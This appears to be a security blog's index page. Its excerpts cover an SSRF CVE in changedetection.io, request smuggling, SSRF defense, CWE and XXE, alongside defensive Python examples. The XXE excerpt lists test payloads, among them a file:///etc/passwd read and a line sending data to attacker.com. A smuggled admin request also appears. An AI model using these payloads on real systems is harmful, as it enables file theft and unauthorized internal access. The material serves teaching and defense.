CVE-2026-27696: SSRF in changedetection.io via URL Validation Bypass

A high-severity SSRF vulnerability (CVSS 8.6) was disclosed on February 25, 2026 in changedetection.io, a popular open-source tool for monitoring web page changes. The bug is a textbook example of a failed allowlist/denylist approach to URL validation, and the default unauthenticated configuration makes it exploitable by anyone with network access to the instance.

What is changedetection.io?

changedetection.io is a self-hosted service that watches URLs for content changes and alerts you when something changes. It’s commonly used by developers, researchers, and sysadmins to monitor pages, APIs, and dashboards. The tool fetches URLs on your behalf, which is exactly the trust relationship SSRF attacks exploit. ...

February 27, 2026 · 3 min · Carl Sampson

AppSec.fyi: A Curated Collection of Application Security Resources

As security researchers and professionals, we often find ourselves searching through countless resources, documentation, and references while working on projects or investigating vulnerabilities. Having a well-organized collection of links and resources can be invaluable for both learning and day-to-day work. This is exactly what appsec.fyi provides: a thoughtfully curated collection of application security resources that serves as a go-to reference point for security professionals.

What is AppSec.fyi?

AppSec.fyi describes itself as “a somewhat curated list of links to various topics in appsec. Mostly, but not always related to application security.” This humble description understates the value of what the site offers. At its core, it’s a centralized hub that organizes security knowledge across multiple domains, making it easy to find authoritative sources and reference materials for common vulnerabilities and security topics. ...

January 18, 2026 · 5 min · chs

Understanding HTTP Request Smuggling Attacks

HTTP Request Smuggling (HRS) is a powerful web application vulnerability that exploits discrepancies in how different servers or intermediaries parse and handle HTTP requests. This misalignment can allow an attacker to “smuggle” a malicious request through a front-end server (such as a load balancer, proxy, or CDN) so that it is interpreted differently by the back-end server.

How HTTP Request Smuggling Works

Modern web applications often rely on chains of intermediaries: proxies, reverse proxies, CDNs, and application servers. These components must all agree on where one HTTP request ends and the next begins. If they disagree, attackers can craft specially malformed requests that cause desynchronization. In practice the disagreement is almost always over which of two framing headers, Content-Length or Transfer-Encoding: chunked, governs the length of the request body when both are present. ...

September 6, 2025 · 2 min · Carl Sampson
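The desynchronisation described in the excerpt above, shown as an added example that is not part of the original post. Two toy framers stand in for a front-end that trusts Content-Length and a back-end that trusts Transfer-Encoding: chunked; neither is real proxy code, and the attacker request is constructed for the demonstration. The front-end forwards one request, the back-end carves two out of the same bytes, and the hardening check flags the ambiguity before anything is forwarded.

```python
# Added example (not from the original post): a CL.TE desynchronisation
# modelled with two toy framers. Front-end stand-in trusts Content-Length,
# back-end stand-in trusts Transfer-Encoding: chunked. The request below is
# constructed for the demo.

CRLF = b"\r\n"


def parse_head(buf):
    """Split off the request line and headers (header names lower-cased)."""
    end = buf.index(b"\r\n\r\n")
    lines = buf[:end].split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, end + 4  # body starts after the blank line


def frame_by_content_length(buf):
    """Front-end behaviour: a request's body is exactly Content-Length bytes."""
    requests = []
    while buf:
        _, headers, body_start = parse_head(buf)
        end = body_start + int(headers.get(b"content-length", b"0"))
        requests.append(buf[:end])
        buf = buf[end:]
    return requests


def frame_by_chunked(buf):
    """Back-end behaviour: Transfer-Encoding: chunked overrides Content-Length."""
    requests = []
    while buf:
        _, headers, body_start = parse_head(buf)
        if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
            pos = body_start
            while True:
                line_end = buf.index(CRLF, pos)
                size = int(buf[pos:line_end].split(b";")[0], 16)  # drop chunk extensions
                pos = line_end + 2
                if size == 0:
                    pos += 2  # CRLF closing the (empty) trailer section
                    break
                pos += size + 2  # chunk data plus its trailing CRLF
            end = pos
        else:
            end = body_start + int(headers.get(b"content-length", b"0"))
        requests.append(buf[:end])
        buf = buf[end:]
    return requests


def has_conflicting_framing(buf):
    """Hardening check: both framing headers on one request is the smuggling
    signature. RFC 9112 section 6.1 lets a server reject it and requires an
    intermediary that forwards it to strip Content-Length first."""
    _, headers, _ = parse_head(buf)
    return b"content-length" in headers and b"transfer-encoding" in headers


# Constructed attacker request. The body after the blank line is 48 bytes:
# "0\r\n\r\n" (5 bytes) terminates the chunked body; the remaining 43 bytes are
# a second request that only the chunked framer treats as a request.
SMUGGLED = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Content-Length: 48\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /admin HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"\r\n"
)


def request_lines(requests):
    """Request line of each framed request, for side-by-side comparison."""
    return [parse_head(r)[0] for r in requests]


if __name__ == "__main__":
    print("front-end sees:", request_lines(frame_by_content_length(SMUGGLED)))
    print("back-end sees: ", request_lines(frame_by_chunked(SMUGGLED)))
    print("ambiguous framing:", has_conflicting_framing(SMUGGLED))
```

In a real attack the smuggled tail is usually left incomplete so that the back-end glues the next user's request onto it; the complete `GET /admin` here just keeps the framing visible. The fix is the same either way: normalise framing at the edge, reject or rewrite requests that carry both headers, and make sure front-end and back-end share one parser behaviour.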

Exploring SSRF Attack Vectors: Understanding the Threat

Server-Side Request Forgery (SSRF) is a vulnerability that lets an attacker make a vulnerable server issue requests of the attacker's choosing to internal or external resources. This can lead to unauthorized access to sensitive data (internal admin interfaces, cloud metadata endpoints), manipulation of server behavior, or exploitation of other services within the network. SSRF abuses the trust that internal systems place in requests originating from the server itself, letting the attacker reach destinations that are normally unreachable from the outside. ...

May 12, 2025 · 7 min · chs

SSRF Defense

Defending Your Web Applications Against Server-Side Request Forgery (SSRF) Attacks

In today’s interconnected digital landscape, web applications face a myriad of security threats. One often overlooked but potentially devastating vulnerability is Server-Side Request Forgery (SSRF). Did you know that, according to a recent report, SSRF attacks have increased by a staggering 270% in the past year alone? In this blog post, we’ll dive into what SSRF is, how it can impact your web applications, and most importantly, the steps you can take to defend against these insidious attacks. ...

April 28, 2025 · 3 min · chs
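The failed denylist approach named in the CVE-2026-27696 excerpt above, the attack surface described in "Exploring SSRF Attack Vectors", and the defence that "SSRF Defense" is about, brought together in one added example that is not taken from any of those posts or from changedetection.io. It is generic Python: a string-matching denylist of the kind that gets bypassed, beside a resolve-then-check validator that decides on the address the fetch would actually connect to. The DNS table and hostnames are constructed so the code runs offline; `live_resolve` shows where a real lookup would go.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed, offline stand-in for DNS so the example runs without network;
# hostnames and addresses are hypothetical.
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "localhost": ["127.0.0.1"],
    "intranet.corp": ["10.0.0.5"],
}


def fake_resolve(host):
    return FAKE_DNS.get(host, [])


def live_resolve(host):
    """Real resolver for production: every A/AAAA answer must pass the check."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


DENYLIST = {"localhost", "127.0.0.1", "0.0.0.0", "169.254.169.254"}


def is_blocked_naive(url):
    """The string-matching denylist that gets bypassed: it compares spellings,
    never the address the fetch will actually connect to."""
    host = (urlsplit(url).hostname or "").lower()
    return host in DENYLIST or host.startswith(("10.", "192.168.", "172.16."))


def host_to_ips(host, resolve):
    """Map a URL host to the concrete addresses a socket would connect to."""
    try:
        # inet_aton accepts the same legacy spellings the connect path does:
        # 127.1, 0177.0.0.1, 0x7f000001 and 2130706433 all mean 127.0.0.1.
        return [ipaddress.IPv4Address(socket.inet_aton(host))]
    except OSError:
        pass
    try:
        return [ipaddress.ip_address(host)]  # IPv6 literal; urlsplit strips the brackets
    except ValueError:
        pass
    return [ipaddress.ip_address(addr) for addr in resolve(host)]


def is_public(ip):
    """True only for addresses outside loopback, private, link-local and similar ranges."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is 127.0.0.1 in disguise
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def is_safe_url(url, resolve=fake_resolve):
    """Resolve-then-check validation that fails closed on anything not clearly public."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    ips = host_to_ips(parts.hostname, resolve)
    return bool(ips) and all(is_public(ip) for ip in ips)


if __name__ == "__main__":
    for candidate in ("http://127.0.0.1/", "http://2130706433/", "http://127.1/",
                      "http://[::ffff:127.0.0.1]/", "http://intranet.corp/",
                      "http://example.com/"):
        print(f"{candidate:32} naive blocks: {is_blocked_naive(candidate)!s:5} "
              f"safe: {is_safe_url(candidate)}")
```

The check is only as good as what happens next: the fetch must connect to the address that was validated (pin it, or re-validate inside the HTTP client's connection hook) and must re-run the check on every redirect hop, otherwise DNS rebinding or a 302 to 169.254.169.254 walks straight past it. Denying private ranges is the floor; where the set of legitimate targets is known, an allowlist of hosts is stronger still.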

What is the Common Weakness Enumeration (CWE)?

Common Weakness Enumeration (CWE) is a catalog of common software and hardware weakness types: the underlying flaws, such as an unchecked array index or a missing authorization check, that give rise to individual vulnerabilities (which CVE tracks). It provides a standardized way of naming and categorizing these weaknesses, making it easier for developers, security analysts, and other professionals to understand, discuss, and address them. CWE is maintained by the MITRE Corporation, a nonprofit organization that operates federally funded research and development centers sponsored by the U.S. government. It includes a comprehensive list of known weakness types, organized into categories based on the kind of flaw, each with a stable identifier of the form CWE-NNN (SSRF, for example, is CWE-918). ...

April 4, 2023 · 2 min · chs

Some XXE Payloads

Here are some common XXE payloads that can be used to test for XXE. Each DOCTYPE below declares an entity named example; the document body must reference it (for instance <replace>&example;</replace>) for the parser to expand it.

Basic payload (internal entity, confirms the parser expands entities at all):
<!DOCTYPE replace [<!ENTITY example "Hello World">]>

Retrieving sensitive files:
<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd">]>

Retrieving files via FTP:
<!DOCTYPE replace [<!ENTITY example SYSTEM "ftp://username:password@ftp.example.com/file">]>

Retrieving files via HTTP:
<!DOCTYPE replace [<!ENTITY example SYSTEM "http://example.com/file">]>

Sending data to a remote server:
<!DOCTYPE replace [<!ENTITY example SYSTEM "http://attacker.com/?data=%file_contents;">]>
(Caveat: a parameter-entity reference such as %file_contents; is only expanded inside the DTD, not inside a general entity's system identifier, so this form exfiltrates nothing as written. Out-of-band exfiltration needs parameter entities, normally declared in an attacker-hosted external DTD that the internal subset pulls in.)

Recursive payload:
<!DOCTYPE replace [<!ENTITY example "Hello &example2;"><!ENTITY example2 "&example;&example;&example;">]>
(Caveat: conforming parsers reject a directly recursive entity reference with a well-formedness error rather than expanding it. The resource-exhaustion variant, "billion laughs", nests entities many levels deep without a cycle.) ...

March 14, 2023 · 1 min · chs
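The defensive counterpart to the payload list above, as an added example that is not from the original post: a Python expat parser configured to refuse the declarations those payloads rely on. The policy refuses every entity declaration with a SYSTEM or PUBLIC identifier, refuses any attempt to resolve an external entity, and caps the number of internal entity declarations (zero by default, so ordinary documents with no DTD parse and anything carrying a DOCTYPE with entities is rejected). The helper names and the three sample documents are constructed for this example.

```python
import xml.parsers.expat as expat


class UnsafeXML(Exception):
    """Raised when untrusted XML declares or references entities we refuse to honour."""


def parse_untrusted_xml(data, max_internal_entities=0):
    """Parse XML with expat under a restrictive entity policy and return the
    concatenated character data. Hypothetical helper written for this example.

    - Any entity with a SYSTEM/PUBLIC identifier (file://, http://, ftp://) is refused.
    - Any attempt to resolve an external entity is refused, as a second line of defence.
    - More than max_internal_entities internal declarations is refused, which
      shuts out expansion attacks before any expansion happens.
    """
    parser = expat.ParserCreate()
    text_parts = []
    declared = []

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        declared.append(name)
        if system_id is not None or public_id is not None:
            raise UnsafeXML(f"external entity declaration refused: {name!r}")
        if len(declared) > max_internal_entities:
            raise UnsafeXML(f"too many entity declarations ({len(declared)})")

    def on_external_ref(context, base, system_id, public_id):
        raise UnsafeXML(f"external entity reference refused: {system_id!r}")

    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.CharacterDataHandler = text_parts.append
    parser.Parse(data, True)  # exceptions raised in handlers propagate out of Parse
    return "".join(text_parts)


def classify(doc, max_internal_entities=0):
    """Return ('ok', text) or ('refused', reason) for one document."""
    try:
        return ("ok", parse_untrusted_xml(doc, max_internal_entities))
    except UnsafeXML as exc:
        return ("refused", str(exc))
    except expat.ExpatError as exc:
        return ("refused", f"parser error: {exc}")


# Constructed sample documents mirroring the payload list.
BENIGN = '<!DOCTYPE replace [<!ENTITY example "Hello World">]><replace>&example;</replace>'
FILE_READ = ('<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd">]>'
             '<replace>&example;</replace>')
RECURSIVE = ('<!DOCTYPE replace [<!ENTITY example "Hello &example2;">'
             '<!ENTITY example2 "&example;&example;&example;">]>'
             '<replace>&example;</replace>')
NO_DTD = '<replace>plain text, no DOCTYPE</replace>'

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("file read", FILE_READ),
                       ("recursive", RECURSIVE), ("no DTD", NO_DTD)):
        print(f"{label:10} default policy: {classify(doc)}")
    print(f"{'benign':10} allow 1 entity: {classify(BENIGN, 1)}")
```

Refusing at declaration time matters more than it looks: by the time an external entity is referenced in content, some parsers have already fetched it, and by the time a nested expansion is noticed the memory is already spent. If the application never needs DTDs at all, the simplest policy is to reject any input containing a DOCTYPE before it reaches the parser.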